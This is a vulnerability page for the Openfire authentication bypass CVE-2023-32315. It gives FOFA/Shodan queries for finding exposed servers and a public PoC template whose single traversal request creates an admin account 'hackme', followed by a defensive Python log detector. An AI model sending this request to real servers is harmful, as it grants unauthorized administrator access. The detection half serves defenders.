CVE-2023-32315-2: Openfire Authentication Bypass Vulnerability

Date: 2025-09-01 | Affected software: Openfire | PoC: public

Vulnerability description

FOFA: app="Openfire-管理界面" SHODAN: title:"openfire"

PoC code [public]

id: CVE-2023-32315-2

info:
  name: Openfire身份认证绕过漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    FOFA: app="Openfire-管理界面"
    SHODAN: title:"openfire"
  reference:
    - https://mp.weixin.qq.com/s/ww4Gr5aJ3QvCdBYLNCiubA
  tags: openfire,bypass
  created: 2023/09/03

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && response.body.bcontains(b'Exception:') && response.raw_header.ibcontains(b'JSESSIONID=') && response.raw_header.ibcontains(b'csrf=')
expression: r0()
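The template above fires on a single request: a path under /setup/ whose `%u002e%u002e` segments decode to `..` and walk out of the setup area into the authenticated admin console page user-create.jsp. The same property makes the bypass easy to spot on the defender's side in web server or reverse proxy access logs: decode the non-standard `%uXXXX` escapes and the usual `%XX` escapes, normalize the path, and flag any request that started under /setup/ but no longer resolves there. The detector below is an added example written for this page; it is not code from the author (zan8in) or from the Openfire project. It assumes combined-log-format lines (Apache/Nginx style), and the sample lines embedded in it are constructed, not captured traffic.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined log format). Not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Sep/2025:10:00:01 +0000] "GET /login.jsp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Sep/2025:10:00:02 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&isadmin=on HTTP/1.1" 200 5678 "-" "Mozilla/5.0"
203.0.113.12 - - [01/Sep/2025:10:00:03 +0000] "GET /setup/index.jsp HTTP/1.1" 200 910 "-" "Mozilla/5.0"
203.0.113.13 - - [01/Sep/2025:10:00:04 +0000] "GET /setup/setup-s/../../user-create.jsp HTTP/1.1" 403 0 "-" "curl/8.0"
203.0.113.14 - - [01/Sep/2025:10:00:05 +0000] "GET /setup/setup-s/./index.jsp HTTP/1.1" 200 42 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Non-standard %uXXXX escape (the form used in the PoC request above).
UNICODE_ESCAPE_RE = re.compile(r'%u([0-9a-fA-F]{4})')

# The URL prefix that Openfire's admin console exempts from its auth check.
UNAUTHENTICATED_PREFIX = "/setup/"


def normalize_path(target: str) -> str:
    """Decode %uXXXX and %XX escapes (two passes, to catch double encoding)
    and collapse '.'/'..' segments, returning the path the server ends up
    routing. The query string is dropped; it does not affect routing."""
    path = urlsplit(target).path
    for _ in range(2):
        path = UNICODE_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), path)
        path = unquote(path)
    if not path.startswith("/"):
        path = "/" + path
    # posixpath.normpath resolves '..' without touching the filesystem;
    # '/setup/setup-s/../../x' becomes '/x'.
    return posixpath.normpath(path)


def is_setup_bypass(target: str) -> bool:
    """True when the raw request path claims to be under /setup/ (and would
    therefore skip authentication) but the normalized path escapes it."""
    raw_path = urlsplit(target).path.lower()
    if not raw_path.startswith(UNAUTHENTICATED_PREFIX):
        return False
    return not normalize_path(target).startswith(UNAUTHENTICATED_PREFIX)


def scan_log(text: str) -> list:
    """Return (client_ip, raw_target, normalized_path, status) for every
    request in `text` that matches the /setup/ traversal pattern. The HTTP
    status is reported but not used as a filter: a 403 still shows an attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_setup_bypass(m.group("target")):
            continue
        hits.append((m.group("ip"), m.group("target"),
                     normalize_path(m.group("target")), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, target, resolved, status in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {resolved} (status {status}) via {target}")
```

Because the check compares the raw prefix against the normalized path rather than grepping for `%u002e`, it catches the plain `..` and `%2e%2e` spellings too; the second sample line and the fourth both resolve to /user-create.jsp, while /setup/setup-s/./index.jsp stays inside /setup/ and is ignored. A request that is blocked (403) still appears in the output, which is what you want when reviewing whether a patched or proxied deployment was probed.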
